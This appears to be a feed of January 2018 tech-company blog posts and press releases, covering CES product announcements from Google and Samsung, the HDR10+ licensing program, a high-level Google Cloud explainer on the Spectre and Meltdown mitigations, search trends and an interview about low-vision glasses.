By Venkat Rapaka, Director of Product Management, Google

The Android Things team has been working closely with our partners to create compelling, secure and thoughtful IoT products. During the Consumer Electronics Show (CES) in Las Vegas, a number of our OEM partners are announcing their first set of products powered by Android Things. These products are built on certified Android Things System-on-Modules (SoMs) from our silicon partners, benefit from regular feature and security updates from Google, and have the Google Assistant and Google Cast seamlessly built in.

New voice-activated speakers powered by Android Things are being announced at CES, including the LG ThinQ WK7 and iHome iGV1. Turnkey hardware solutions based on the Qualcomm SD212 Home Hub Platform, MediaTek MT8516 and Rockchip RK3229 SoM are certified for the Assistant and Cast, and NXP i.MX 8M is coming soon. Three of our Original Design Manufacturer (ODM) partners, Tymphany, Goertek, and Tonly, have created full speaker reference designs based on these SoMs to further reduce development cost and time-to-market.

Today, we also announced that the Google Assistant is coming to smart displays powered by Android Things. These new devices have the Assistant and Cast built in, and with the added benefit of a touch screen, they can help you see and do more. Smart displays from JBL, Lenovo, LG (all based on the Qualcomm SD624 Home Hub Platform) and Sony (based on the MediaTek MT8173 SoM) will be available later this year.

Of course, Android Things is designed to support a wide variety of devices beyond speakers and smart displays. Prototype demos, including HandBot, DrawBot, a 3D printer, and AI artwork T-shirts, can be found in the NXP booth.

Starting tomorrow, you can visit the Google Assistant Playground (booth CP-21) at CES to view new products, chipsets, and reference designs by our partners. In addition, these devices are also available for display in other company spaces throughout the conference, including Lenovo, LG, JBL, Qualcomm, MediaTek, NXP, Rockchip, iHome, Goertek, and Tymphany.

Android Things is currently in Developer Preview, and you can get started with the latest version, DP6.1. You can use the Android Things Console to download system images and flash existing devices. Feedback can be given by filing bug reports and feature requests, as well as on Stack Overflow or in Google's IoT Developers Community. The Long Term Support release will be available this year, with more details coming soon.

Samsung Expands Laundry Line Up with New Premium Compact Washer

 

Samsung Electronics today announced that it is bringing its next generation laundry innovation to the U.S.:  the WW6850N washing machine featuring revolutionary QuickDrive™ technology. Responding to consumer demand for speed and cleaning performance, the 24” compact washer cleans laundry up to 35% faster for a thorough clean1, compared to current Samsung models. The WW6850N will be on display at the upcoming International Consumer Electronics Show (CES) in Las Vegas from January 9-12, 2018.

 

With more Millennials than ever buying homes, this new cohort of digitally savvy homebuyers is demanding home appliances that incorporate meaningful, personalized technology to enhance their lives. The WW6850N with QuickDrive™ technology is just the latest in a line of differentiated laundry innovations, including the activewash™ Top Load Washer, AddWash™ Front Load Washer and FlexWash + FlexDry laundry pair.

 

“When you’ve got a pile of laundry to do, you just want to get it done as quickly and efficiently as possible,” said Shane Higby, Vice President, Home Appliance Marketing, Samsung Electronics America. “The introduction of the WW6850N washing machine with QuickDrive™ technology underscores our commitment to providing consumers with options for tackling their laundry needs to free up time for what really matters.”

 

The WW6850N washer’s innovative performance starts with QuickDrive™ technology, which features a large main drum and a back plate that move independently. This creates a dynamic action that moves clothes in four directions – up and down, and back and forth – to quickly, gently and thoroughly remove dirt for a more powerful and intense wash cycle that takes up to 35% less time than other comparable Samsung machines1. Additionally, at 24” wide and stackable, the WW6850N washer and its companion dryer are an ideal size for small spaces like first floor laundry rooms or closets just off the master suite, to conveniently tackle loads quickly and effectively.

 

The WW6850N is IoT-ready and compatible with Samsung’s SmartThings ecosystem. Its Q-rator laundry assistant has smart capabilities that simplify the washing cycle with intuitive features:

 

  • Laundry Recipe provides automatic recommendations for optimal wash cycles based on the color, fabric type, and degree of soiling inputted by the user.
  • Laundry Planner allows consumers to manage the time that a wash cycle will finish, adjusting cycle settings accordingly.
  • HomeCare Wizard monitors the washer to keep it operating at optimal performance and provides easy-to-follow maintenance instructions.

 

A 2018 CES Innovations Award honoree, the WW6850N washing machine with QuickDrive™ technology will be available in the U.S. this year.


1 Tested on Samsung WW6850N with WW6800K. Saves up to 35% time on Heavy Duty (hot, 6lb load) with a washing performance within ± 3%, based on internal data tested by AHAM HLW-1-2013.

20th Century Fox, Panasonic and Samsung Gain Momentum for Best Possible TV-Viewing Experience with HDR10+ Technology

20th Century Fox, Panasonic Corporation and Samsung Electronics today announced updates to the certification and logo program for HDR10+, the open, royalty-free dynamic metadata platform for High Dynamic Range (HDR) that they initially announced last year at IFA.

 

The HDR10+ platform will soon be made available to content companies, manufacturers of ultra-high definition TVs, Blu-ray disc players/recorders and set-top boxes, and SoC vendors, royalty-free with only a nominal administrative fee. Companies can view the new logo, learn about the license program (including final specifications and adopter agreements), and sign up at http://www.hdr10plus.org to be notified when the HDR10+ technical specifications become available. In addition, Ultra HD Blu-ray metadata generation tools have been developed with third parties and will soon be available to content creators, enabling Ultra HD Blu-ray players to enter the market. Details on the content transfer and interface format for the content creation pipeline will also be released shortly.

 

HDR10+ will offer a genuinely premium HDR experience for viewers through a device certification program ensuring an accurate representation of the creative intent expressed in the content. Also, its workflow improvements for creators will encourage increased production of premium HDR content.

 

The HDR10+ license program will provide interested companies with the necessary technical and testing specifications to implement HDR10+ technology in a way that both maintains high picture quality and gives each manufacturer the ability to apply dynamic tone mapping innovatively. The accompanying certification program will ensure that HDR10+ compliant products meet good picture quality and deliver the creative intent of movie directors and cinematographers. A certified product will feature the HDR10+ logo, which signifies the product’s excellent picture quality.


Key aspects of the license program will include:

 

  • Benefits for device manufacturers (e.g., TV, Ultra HD Blu-ray, OTT STB, etc.), content distribution services providers, SoC manufacturers, content publishers, and content creation tool providers.
  • No per unit royalty.
  • A nominal annual administration fee for device manufacturers, SoC manufacturers and content distribution service providers.
  • Technical specification, test specification, HDR10+ logo/logo guide, patents from the three companies directly related to the technical specification and the test specification.
  • Certification for devices will be performed by a third-party, authorized testing center.

 

Once the HDR10+ license program is open, the three founding companies will incorporate HDR10+ technologies in all future Ultra HD movie releases, selected TVs, Ultra HD Blu-ray player/recorders, and other products.

 

“It was important for us to create an open system that is flexible and offers a viewing experience much closer to the filmmaker’s creative intent for the film,” said Danny Kaye, Executive Vice President of 20th Century Fox, and Managing Director of the Fox Innovation Lab. “Together with Samsung and Panasonic, we aim to standardize the licensing process making it easy for partners, including content creators, television and device manufacturers, to incorporate this technology and improve the viewing experience for all audiences.”

 

Support continues to grow for HDR10+ and companies are looking forward to applying the 3C specifications and certification program. More than 25 companies spanning many different industries have expressed strong interest in supporting the HDR10+ platform, further reinforcing its path to success.

 

Amazon Prime Video, the first streaming service provider to deliver HDR10+, has made the entire Prime Video HDR library available in HDR10+ globally. The Prime Video HDR10+ catalog includes hundreds of hours of content such as Prime Originals The Grand Tour, Golden Globe®-nominated The Marvelous Mrs. Maisel, Jean-Claude Van Johnson, The Tick and The Man in the High Castle plus hundreds of licensed titles.

 

Warner Bros. Home Entertainment will support HDR10+ to enable a dynamic metadata solution for Warner Bros. content to Samsung, Panasonic and other HDR10+ capable 4K HDR TVs. “Warner Bros. has always strived to provide the best next gen home entertainment experience to consumers,” said Jim Wuthrich, President of the Americas and Global Strategy, Warner Bros. Home Entertainment. “With HDR10+ dynamic metadata, WB can continue to more accurately bring the filmmakers’ vision of our 2018 releases and our vast catalog of over seventy-five 4K HDR titles to the home across a broad range of HDR10+ capable TV’s.”

 

The new HDR10+ technology optimizes picture quality for next generation displays by using dynamic tone mapping to reflect frame to frame or scene to scene variations in brightness, color saturation, and contrast, which makes for an enhanced viewing experience. HDR10+ technology optimizes the performance of many 4K ultra-high definition TVs, enabling playback on a wide range of next generation TVs bringing user experience much closer to the original creative intent for Hollywood films.

 

“By bringing together know-how and technology from the three founding companies, HDR10+ has the potential to deliver considerable picture quality benefits to both viewers and creators alike,” said Toshiharu Tsutsui, Director of Panasonic’s TV Business Division. “Accordingly, Panasonic anticipates wide support for HDR10+.”

 

“Samsung is committed to technological innovation across our TVs and HDR10+ represents an evolution in display quality for the best possible viewing experience,” said Jongsuk Chu, Senior Vice President of Visual Display Business at Samsung Electronics. “We have also designed the HDR10+ platform to encourage future development in order to deliver further enhanced technology in the years to come.”

 

20th Century Fox, Panasonic and Samsung will show technical demonstrations of HDR10+ technology at CES 2018. Accredited journalists or parties interested in the license program may email chris.bess@fox.com for more information. Accredited journalists can see Panasonic's HDR10+ technical demo at its suite at the MGM Grand Conference Centre. An HDR10+ technology demo will be held at Samsung's First Look event at Enclave Las Vegas on 7th January.

 

To learn more about the HDR10+ license program, please contact the HDR10+ license administration office at info@hdr10plus.org.


About Twentieth Century Fox Home Entertainment

Twentieth Century Fox Home Entertainment, LLC (TCFHE) is the industry-leading worldwide marketing, sales and distribution company for all Fox produced, acquired and third-party partner film and television programming. Each year TCFHE expands its award-winning global product portfolio with the introduction of new entertainment content through established and emerging formats including DVD, Blu-ray™, Digital and VOD. Twentieth Century Fox Home Entertainment is a subsidiary of 20th Century Fox, a 21st Century Fox company.

 

About Panasonic

Panasonic Corporation is a worldwide leader in the development of diverse electronics technologies and solutions for customers in the consumer electronics, housing, automotive, and B2B businesses. Celebrating its 100th anniversary in 2018, the company has expanded globally and now operates 495 subsidiaries and 91 associated companies worldwide, recording consolidated net sales of 7.343 trillion yen for the year ended March 31, 2017. Committed to pursuing new value through innovation across divisional lines, the company uses its technologies to create a better life and a better world for its customers. To learn more about Panasonic: http://www.panasonic.com/global.

[Editorial] Do Everything, Everywhere with Samsung’s New Ultraslim Notebooks

There’s no denying it – the PC industry has changed. With tablets, smartphones, and wearables, we have the ability to shape our computing experience around our lives like never before. But that doesn’t mean that the PC market is shrinking. Far from it – it’s evolving in a whole new way. Consumers who once preferred a traditional laptop are choosing slim, powerful notebooks that give them the flexibility to do everything, everywhere.

 

That’s important, because the way we work has changed as well. For many, the work day begins the moment they wake up, and often stretches well beyond dinner time. In 2018, true portability and productivity is knowing you have a single notebook that makes it possible to do what you can’t do with just a tablet or desktop. It’s thin enough to slip into your “go” bag. It’s light enough to carry all day, every day, and almost forget it’s there. It’s strong enough to endure the bumps in the road and the inevitable scrapes from the airport security bin.

 

At Samsung, we’re leading the evolution of the PC. Our portfolio includes 2-in-1 tablets with detachable keyboards, for those who want the ultimate in portability, along with Samsung Chromebooks, for those who want access to their favorite Google apps and services. For those who want the ultimate in power, portability, and performance, I’m excited to introduce a new series of PCs.

 

Our new ultraslim notebooks combine convenience with performance and design – establishing what it means to create a premium PC experience for the way we live and work today. Whether you’re working up an important presentation, drafting your next big plan, or playing your favorite game on the go, you need immersive graphics, processing power, and frame rate. Our new series of notebooks give you the screen, power, graphics, memory, storage, and battery life to make your old laptop seem, well, old.

 

Before we engineered our new notebooks, we listened to you. We heard what you wanted and what you needed. You told us you wanted the flexibility to do, with one notebook, more than you can do with a simple tablet or a thick laptop. So we designed a range of mobile computing experiences to meet the needs of the modern, mobile workforce—helping everyone do more at home, at the office, and on the go.

 

Versatility and performance are important – but as any frequent traveler will attest, durability is important as well. Keeping that in mind, we’ve developed an entirely new material to wrap it all up: Metal 12™. This magnesium alloy is incredibly light, yet unbelievably strong – and feels amazing in hand. And Metal 12™ is available only on Samsung devices. It’s one more way our investments in R&D are delivering next-level durability and premium design.

 

Our new series of ultrathin notebooks are designed for different people with different needs, who want to use their time in the most productive way they can:

 

Samsung Notebook 9 Pen with the built-in S pen

 

Notebook 9 Pen is the ultraslim 2-in-1 convertible for those who want the most computing power with the creative power of the S Pen. Perfected in Samsung Galaxy mobile devices, the battery-free S Pen replicates the ease, accuracy, and size of a real pen, so you can enjoy a natural writing and drawing experience – without having to ever charge it. Jot notes. Use CAD. Sketch freehand. If you want to work, create, design or draw, the Notebook 9 Pen puts no limit on how you can express yourself. It’s a whole new way to use your notebook PC.

 

Samsung Notebook 9 (2018)

 

Notebook 9 (2018) is the notebook for those who want the most powerful graphics in the slimmest package. When you're on the go – whether on business travel, headed to class, or working – taking a laptop is still a given. With this extremely light PC, which weighs no more than 2.84 pounds, Samsung is taking weight off your back and creating more room in your pack. The Notebook 9 (2018) has all the durability with none of the weight. Powerful graphics bring movies and games to life on screen, with battery capacity that lets you stay immersed in your favorite content throughout the day.

 

Samsung Notebook 7 Spin (2018)

 

Notebook 7 Spin (2018) is the "best of basics" 2-in-1 convertible for those who want Samsung design at an affordable price. If you're always moving from home to office or from class to class, flexibility is the name of the game. With the Notebook 7 Spin (2018) you can flip easily from PC to tablet and back, work anywhere – even in the dark – with the backlit keyboard, and use your Active Pen (sold separately) to express yourself in an entirely new way. The Notebook 7 Spin (2018) design gives you the flexibility to work anywhere, and the Intel 8th Generation quad-core processor gives you the power to do it all.

 

I’m excited to show off our new ultraslim notebooks at CES this year. They’re compact, powerful, and designed to deliver a premium experience that’s all about helping you create more and enjoy more, wherever you are.

Samsung Introduces the New Notebook 7 Spin (2018), a Flexible PC for Everyday Users

 

Samsung Electronics today announced the Samsung Notebook 7 Spin (2018), a versatile notebook that provides consumers with the accessibility needed to remain productive in today’s digital world.

 

Designed for working professionals, students and those looking for entertainment, the Notebook 7 Spin (2018) offers modern features including a 360-degree touchscreen for added convenience; an Active Pen (sold separately) for quick and easy note-taking; as well as the power and performance for more efficient multi-tasking.

 

“Our customers wanted a functional, intuitive device that includes a wide range of their favorite features, and that’s what we’ve delivered with the Notebook 7 Spin (2018),” said YoungGyoo Choi, Senior Vice President of the PC Business Team, Mobile Communications Business at Samsung Electronics. “This device meets the needs of today’s digital lifestyle, combining work and play with a smart, seamless and personalized experience that connects users with their other devices.”

 

At CES 2018, Samsung will showcase the new Notebook 7 Spin (2018) and a variety of features that allow consumers to work wherever, whenever and however they want while staying secure. These features include:

 

  • 360-Degree Rotating Touchscreen – Provides the flexibility to view content as preferred, whether it be as a tablet or as a traditional PC in landscape mode
  • Active Pen-enabled – Perfect for attending meetings, conference calls or lectures, the Active Pen lets users create a sketch or jot down notes on the fly
  • Secure Fingerprint Log-in – Through simple fingerprint scanning, users can quickly log-in with Windows Hello and keep files secure in their own Privacy Folder
  • Power and Performance – Runs on the Windows 10 operating system and is equipped with an Intel Core i5 processor and a 256GB SSD for quicker startups and advanced multi-tasking
  • Voice Note – Advanced smart recording featuring an integrated far field microphone to capture every detail of important meetings or lectures, which can be stored and shared easily via Samsung Cloud
  • Battery and Backlit Keyboard – Extended battery power to keep users connected throughout the day
  • Studio Plus – For users who wish to express their creative side, Studio Plus allows them to produce personalized movies featuring their favorite photos and videos

 

The Samsung Notebook 7 Spin (2018) will be available in the U.S. and other select countries starting in the first quarter of 2018.


Samsung Notebook 7 Spin (2018) Product Specifications*

PROCESSOR   8th Gen Intel Core i5 (quad core)
MEMORY      8GB RAM / 256GB SSD
MATERIAL    A/C Metal
LCD         13.3” FHD PLS
DIMENSIONS  315.8 x 215.4 x 18.5mm
POWER       43Wh
WEIGHT      1.53kg
PORTS       USB-C, USB 3.0 x 1, USB 2.0 x 1, HDMI, HP/Mic
CAMERA      VGA
STYLUS      Active Pen
SECURITY    Fingerprint, Windows Hello, Privacy Folder
KEYBOARD    Backlit keyboard, 1.5mm keystroke, curved keycaps
TOUCHPAD    Clickpad (Precision Touchpad)

 

*All functionality, features, specifications and other product information provided in this document including, but not limited to, the benefits, design, pricing, components, performance, availability, and capabilities of the product are subject to change without notice or obligation.

Bringing Programmability and NetDevOps to Barcelona for #CLEUR

It’s right around the corner… Cisco Live Europe 2018 in Barcelona, and I absolutely can’t wait!  Every Cisco Live I’ve ever been to, or presented at, has been an amazing experience, but Barcelona is going to be in a league of its own.  From the moment I arrive in Spain on Friday morning the entire […]

Five Things You Can Do to Manage Your Privacy Now

The Internet of Things – the increasingly connected world in which we live – is rapidly expanding. We love our convenient and fun ​devices – ​like​ ​personal assistants, wearables, speakers, cameras, TVs, cars, home alarm systems, toys and appliances. But it’s important to understand that connected devices rely on information about us – such as […]

Answering your questions about “Meltdown” and “Spectre”

This week, security vulnerabilities dubbed “Spectre” and “Meltdown” made news headlines. On Wednesday, we explained what these vulnerabilities are and how we're protecting you against them.

Since then, there's been considerable discussion about what this means for Google Cloud and the industry at large. Today, we’d like to clear up some confusion and highlight several key considerations for our customers.

What are “Spectre” and “Meltdown”?


Last year, Google’s Project Zero team discovered serious security flaws caused by “speculative execution,” a technique used by most modern processors (CPUs) to optimize performance.

Independent researchers separately discovered and named these vulnerabilities “Spectre” and “Meltdown.” 

Project Zero described three variants of this new class of speculative execution attack. Variants 1 and 2 have been referred to as “Spectre,” and Variant 3 as “Meltdown.” Most vendors refer to them by their Common Vulnerabilities and Exposures (CVE) labels, an industry-standard way of identifying vulnerabilities.


There's no single fix for all three attack variants; each requires protection individually.

Here's an overview of each variant:

  • Variant 1 (CVE-2017-5753), “bounds check bypass.” This vulnerability affects specific code sequences within compiled applications, which must be addressed on a per-binary basis. This variant is the basis for current concern around browser attacks, JavaScript exploitation and vulnerabilities within individual binaries.

  • Variant 2 (CVE-2017-5715), “branch target injection.” This variant may be fixed either by a CPU microcode update from the CPU vendor, or by applying a software protection called “Retpoline” to binaries where information leakage is a concern. This variant underlies current concerns around cloud virtualization and “hypervisor bypass” attacks that affect entire systems.

  • Variant 3 (CVE-2017-5754), “rogue data cache load.” This variant is the basis for the discussion around “KPTI,” or “Kernel Page Table Isolation.” An attacker who already has the ability to run code on a system can use it to read memory they do not have permission to access.

For more information on these variants, please read this week’s Google Security post.

Am I protected from Spectre and Meltdown?  


Google’s engineering teams began working to protect our customers from these vulnerabilities as soon as we learned of them in June 2017. We applied solutions across the entire suite of Google products, and we collaborated with the industry at large to help protect users across the web.

G Suite and Google Cloud Platform (GCP) are updated to protect against all known attack vectors. Some customers may worry that they have not been protected since they were not asked to reboot their instance. Google Cloud is architected in a manner that enables us to update the environment while providing operational continuity for our customers. Via live migration we can patch our infrastructure without requiring customers to reboot their instances.

Customers who use their own operating systems with Google Cloud services should continue to follow security best practices and apply security updates to their images just as they would for any other operating system vulnerability. We're providing an up-to-date reference on the availability of vendor patches for common operating systems on our GCE Security Bulletin page.


I’ve heard that Spectre is nearly impossible to protect against. Is this true?


There has been significant concern in particular about “Spectre.” The use of the name “Spectre” to refer to both Variants 1 and 2 has caused some confusion over whether it's “fixed” or not.

Google Cloud instances are protected against all known inter-VM attacks, regardless of the patch status of the guest environments, and attackers do not have access to any customers’ data as a result of these vulnerabilities. Google Cloud and other public clouds use virtualization technology to isolate neighboring customer workloads. A virtualization component known as a hypervisor connects the physical machine to virtual machines. This hypervisor can be updated to address Variant 2 threats. Google Cloud has updated its hypervisor using “Retpoline,” which addresses all currently known Variant 2 attack methods.

Variant 1 is the basis behind claims that Spectre is nearly impossible to protect against. The difficulty is that Variant 1 affects individual software binaries, so it must be handled by discovering and addressing exploits within each binary.

Risks that Variant 1 would pose to the infrastructure underpinning Google Cloud are addressed by the multiple security controls that make up our layered “defense in depth” security posture. Because Google is in full control of our infrastructure from the hardware up to our secure software development practices, our infrastructure is protected against Variant 1. You can read more about the security foundations of our infrastructure in our whitepaper.

We work continuously to stay ahead of the constantly-evolving threat landscape and will continue to roll out additional protections to address potential risks.

As a user of the public cloud, am I more vulnerable to Spectre and Meltdown than others?

In many respects, public cloud users are better protected from security vulnerabilities than are users of traditional datacenter-hosted applications. Security best practices rely on discovering vulnerabilities early, and patching them promptly and completely. Each of these activities is aided by the scale and automation that top public cloud providers can offer. For example, few companies maintain a several-hundred-person security research team to find vulnerabilities and patch them before they're discovered by others or disclosed. And the ability to update millions of servers in days, without requiring maintenance windows, is difficult technology to develop, but it allows patches and updates to be deployed quickly after they become available, without the user disruption that can damage productivity.

Spectre and Meltdown are new and troubling vulnerabilities, but it’s important to remember that there are many different types of threats that Google (and other cloud providers) protect against every single day. Google’s cloud infrastructure doesn’t rely on any single technology to make it secure. Our stack builds security through progressive layers that deliver defense in depth. From the physical premises to the purpose-built servers, networking equipment, and custom security chips to the low-level software stack running on every machine, our entire hardware infrastructure is Google-controlled, -secured, -built and -hardened.

Is performance impacted?

On most of Google’s workloads, including our cloud infrastructure, we've seen negligible impact on performance after applying remediations. This was explained further in our follow-up Security blog post on January 4.

There are many conflicting reports about patch impacts being publicly discussed. In some cases, people have published results of tests that focus solely on making API calls to the operating system, which does not represent the real-world scenario that customer software will encounter. There's no substitute for testing to determine for yourself what performance you can expect in your actual situation. We believe solutions exist that introduce minimal performance impact, and expect such techniques will be adopted by software vendors over time. We designed and tested our mitigations for this issue to have minimal performance impact, and the rollout has been uneventful.

Where can I get additional information?

  • Our Support page offers a list of affected Google products and will be updated with their current status of mitigation against these risks

  • Our GCP Security Bulletins page will provide notifications as other operating system maintainers publish patches for this vulnerability and as Compute Engine releases updated OS images

Threat Round Up for December 29 – January 5

Today, Talos is publishing a glimpse into the most prevalent threats we’ve observed between December 29 and January 05. As with previous round-ups, this post isn’t meant to be an in-depth analysis. Instead, this post will summarize the threats we’ve observed by highlighting key behavior characteristics, indicators of compromise, and how our customers are automatically […]

New year, new searches: resolutions, “bomb cyclone” and Coachella

It’s a new year, and some of this week’s trends (with data from Google News Lab) are about adjusting: to a new gym routine, unexpected weather, and a new law in California.

Treadmill time

New Year’s resolutions = more searches for “gyms near me.” In fact, search interest in the phrase hit an all-time high this month. Despite a heightened desire to hit the gym, interest in “new year diet” was 200 percent higher than “new year exercise” this week. Looking ahead to the new year, people are wondering: “What is a New Year’s resolution for kids?” “What is the history behind New Year’s resolutions?” and “Who made the first New Year’s resolution?”

Do you wanna build a snowman?

“What is a bomb cyclone?” was a top-searched question this week as a massive winter storm hit the east coast of the U.S. Snow is showing up in unexpected places around the country as well: when people search for “Snow in...” the most popular locations are Florida, Tallahassee and Orlando. And with cold weather taking over, search interest in “frozen pipes” reached its highest point since 2004 this week. Top “how to” searches include “how to thaw frozen pipes,” “how to keep pipes from freezing,” and “how to fix frozen pipes.”

Desert calling

Despite the cold weather, people have something warm to look forward to: The lineup for Coachella 2018 was announced this week, and search interest in “Coachella tickets” went up nearly 6,500 percent. Coachella-goers are already looking into lodging, with “Coachella airbnb” searched 100 percent more than “Coachella hotel.” The top-searched Coachella performers were Cardi B, Eminem, Beyoncé, Post Malone and Migos.


Coachella isn’t even the biggest news in California …

Recreational marijuana was on people’s minds (and on sale for the first time in California) this week. In California, top questions included “where to buy legal weed in Los Angeles,” “What is the tax on weed in California,” and “Where can I buy marijuana?” Meanwhile, following the announcement that the Justice Department is rescinding a policy that enabled legalized marijuana to flourish in many states, the top trending question nationwide was “Why are marijuana stocks down?”

Ready for the coin toss in the South

For the first time, two SEC teams—University of Alabama and University of Georgia—will face off in the College Football National Championship on Monday. Though the game’s outcome is yet to be decided, search interest in “Alabama Crimson Tide football” is beating “Georgia Bulldogs football” by 190 percent. After Georgia’s overtime win in the semi-final, the top trending college football questions this week were about overtime: “How does overtime work in college football?” “How many overtimes are in college football?” and “How long is overtime in college football?”

How Google Home and the Google Assistant helped you get more done in 2017

Both the Google Assistant and Google Home had a very big year in 2017, with new devices, new languages and new features. The Assistant is now available on more than 400 million devices, including speakers like Google Home, Android phones and tablets, iPhones, headphones, TVs, watches and more. We brought the Google Assistant to a dozen countries, from France to Japan, offering help in 8 languages around the globe.

With Google Home Mini and Google Home Max in addition to our original Google Home, we brought you even more ways to use the Assistant in your home. So it’s no wonder we’ve sold tens of millions of all our Google devices for the home over this last year. And in fact, we sold more than one Google Home device every second since Google Home Mini started shipping in October.

As we’ve added more features—like Voice Match,  Broadcast and Hands-Free Calling—the Google Assistant has become even more helpful. Your Assistant now gives you the power to voice control more than 1,500 compatible smart home devices from over 225 brands. With all these choices, you've connected millions of new smart home devices to Google Home every month. All told, Google Home usage increased 9X this holiday season over last year’s, as you controlled more smart devices, asked more questions, listened to more music, and tried out all the new things you can do with your Assistant on Google Home.

No matter where you are, the Google Assistant is here to help you make the most of 2018. And next week, we have even more things in store for the Assistant at the Consumer Electronics Show in Las Vegas. If you’re at CES, stop by the Google Assistant Playground (Central Plaza-21) to check out some of our new integrations, devices, and the newest ways you can use your Assistant.


[Interview] An Inside Look at the Development of Relúmĭno

This year at CES, Samsung is showcasing Relúmĭno glasses – smart visual-aid eyeglasses that help people with visual impairments see images more clearly when reading a book or viewing an object. The Relúmĭno app and glasses are expected to make the technology more comfortable for people with visual impairments to use.

 

But what exactly did it take to develop a product like Relúmĭno? Last year, Samsung partnered with Professor Moon Nam Ju’s team at the Department of Ophthalmology of Chung-Ang University Hospital for clinical trials involving Relúmĭno. Here, Professor Moon discusses the team’s efforts to make Relúmĭno more convenient and helpful for people with visual impairments.

 

 

 

Q. Please introduce your clinical research team.

 

The low vision clinic of Chung-Ang University Hospital has ophthalmologists, nurses, opticians and hospital social workers. It supports people with low vision in overcoming the obstacles of everyday life and achieving a better quality of life. Our clinic worked together with Relúmĭno, a project team of Samsung C-Lab, on the clinical trial.

 

 

Q. How did you become a part of Relúmĭno development?

 

I was always concerned with ways to help patients with low vision in their rehabilitation. Unfortunately, many of these patients consider themselves blind and give up on treatment, resulting in lost opportunities to get better. When Jeonghun Cho, Leader of Relúmĭno, came to me with his plan for Relúmĭno, it was a new inspiration. I joined the project willingly as Leader Cho’s intentions were good and genuinely focused on the well-being of patients.

 

 

Q. Please explain the clinical trials for the development of Relúmĭno.

 

We recruited patients with visual impairments who also knew how to use electronic devices. We surveyed the patients to find out what low-vision aids they were already using, the purpose of those devices, and the patients’ satisfaction with them. We also analyzed clinical improvements by repeating visual function examinations – best-corrected visual acuity at long and short distances, contrast sensitivity, and reading speed – before and after use of the device.

 

 

Q. How did the examinations proceed?

 

Patients who were not satisfied with conventional low vision aid devices were mostly positive about the clinical trial. Among the low vision patients who participated in the trial, around 40 were selected to have their visual functions examined without using any aid devices. After explaining the functions of Relúmĭno and how to use them, we reexamined the patients.

 

 

Q. Regarding the research design and trial procedures, was there anything you paid particular attention to?

 

Most people with low vision use magnifiers to see objects at short distances. For long distances, telescopes can be used, but they are not very practical: they are not easy to carry and they narrow the user’s field of view. When we designed Relúmĭno, we wanted to make a vision aid device that supports both short and long distances at the same time. We also wanted to add a function to help patients with macular damage see clearly, as those patients could not be helped by conventional optical vision aids.

 

 

Q. What was the result of clinical trials?

 

A total of 39 of the 40 patients completed the trial; their average age was 54.64 (standard deviation 22.70). Over 97% of patients had significant improvement in their vision at short, medium and long distances while using the device. People with low vision whose best-corrected visual acuity was at most 0.1 achieved up to 0.8 with Relúmĭno.

 

 

Their contrast sensitivity and reading accuracy also improved with statistical significance. On device satisfaction, all patients responded that they were satisfied with the performance of Relúmĭno, and more than half (54%) answered that the device was easy to use. Patients rated their average visual function for everyday activities at around 11.7 points (out of 30) before the trial; this increased to 19.5 points after using the device.

 

 

Q. Has there been any feedback from the patients with low vision in the clinical trial reflected in Relúmĭno? Please explain which feedback was well implemented.

 

Relúmĭno went through several rounds of improvement to become the product you see today. We held several meetings to listen to what the patients had to say. In the beginning, patients had difficulties with dizziness, slow focusing speed and awkward control of the device. The Relúmĭno team immediately incorporated the patients’ feedback and updated the device based on their needs, and that is one of the most important reasons the result is so successful.

 

 

Q. Can you give us some cases where patients received huge benefits from using the Relúmĭno app?

 

All patients who participated in the research were very satisfied with Relúmĭno. One patient, who due to macular damage could only see straight ahead by turning the head (“eccentric viewing”), was happy that Relúmĭno’s relocation function eliminated the need to turn the head to see the front. Another patient, who suffered from depression after losing sight and becoming unemployed, used the Relúmĭno app and regained the strength to live a normal life again. That patient found another job and thanked us several times.

 

 

Q. Please tell us your expectations on Relúmĭno in the future.

 

Lately, many people have become interested in the area of low vision, but there are not enough rehabilitation facilities and resources for people with low vision in Korea. As the saying goes, well begun is half done; I hope Relúmĭno will be the foundation for drawing more attention and support to people with low vision, giving them the courage and hope to achieve a better future.

[Editorial] Delivering on the Promise of a Connected World, Today

For those of us in the tech and related industries, the start of each new year is a time for personal reflection, but also a time for professionals passionate about technology to come together to share and envision the latest in technology innovation at the annual Consumer Electronics Show (CES) in Las Vegas.

 

For the past several years, the Internet of Things (IoT) has remained the industry’s biggest buzzword for its promise of delivering seamless connectivity across the many devices and technologies we interact with in our daily lives – from our smartphones to smart TVs to the Family Hub refrigerator and even our cars. Yet while the vision has been alluring, with IoT and related technologies still maturing, the promise has always remained ‘a few years off.’

 

At CES 2018, our aim, at Samsung, will be to show you the work we’ve done to change that, and to begin delivering on the promise of a connected world, today.

 

Across the many and varied devices consumers interact with at their places of business, at home, and on the go, each is typically encumbered by a different setup process, a password to remember, and an interface to learn and manage – which has made the connected experience anything but easy.

 

At Samsung, we decided to do something about this. At this year’s CES, we’ll be sharing our breakthroughs in making the IoT experience easy and intuitive for you: seamless connectivity between devices through a single experience, backed by an integrated ecosystem that manages all your devices in close, fluid synchronization.

 

The connected experience we will be introducing is also powered by a personalized intelligence interface, with the aim of ensuring you can tap into all the potential and power this connectedness provides, as easily as flipping a switch. Understanding that innovation on this scale, and delivering a truly connected world, can’t happen in a silo, we’ve also worked closely with industry partners as part of the largest IoT standardization body, the Open Connectivity Foundation (OCF), which I will discuss further at the show.

 

Until now, the promise of a world of connected devices has remained too fragmented, and as a result too complex and difficult for consumers to navigate or practically take advantage of. A connected world, however, should be anything but: it should work for you and make life easier for you. I couldn’t be more excited to share how Samsung is bringing this vision to reality in just a few days’ time at CES 2018.

NEW DevNet Sandbox! Play live with Istio on Kubernetes to manage your microservice mesh

Most of the development world is aware of the microservices and containerisation movement, given we’re now in 2018! When folks start working with microservices, they quickly realise that they proliferate fast. One application can contain a large number of microservices that all need to interact and talk to each other for lots of different reasons […]

Top 10 Smart City Trends for 2018

Did you know that Smart Cities are poised to drive significant change in how we work, play and learn in 2018? Thanks to the explosion in big data analytics capabilities and mobile, real-time video/information sharing, historians may someday look back on this year as the fulcrum upon which technology and government fully meshed to turn […]

Google for Nonprofits: 2017 in review

Every year nonprofits worldwide work tirelessly to make a positive impact in their communities, and in a year where many people were looking to help, 2017 was no exception. We’re looking back to celebrate the nonprofits around the globe using Google tools to help in their philanthropic efforts. Here are some successes from last year—we hope they give you some ideas for how you can improve your nonprofit’s productivity and have even more impact in 2018.

Unlocking G Suite for Nonprofits

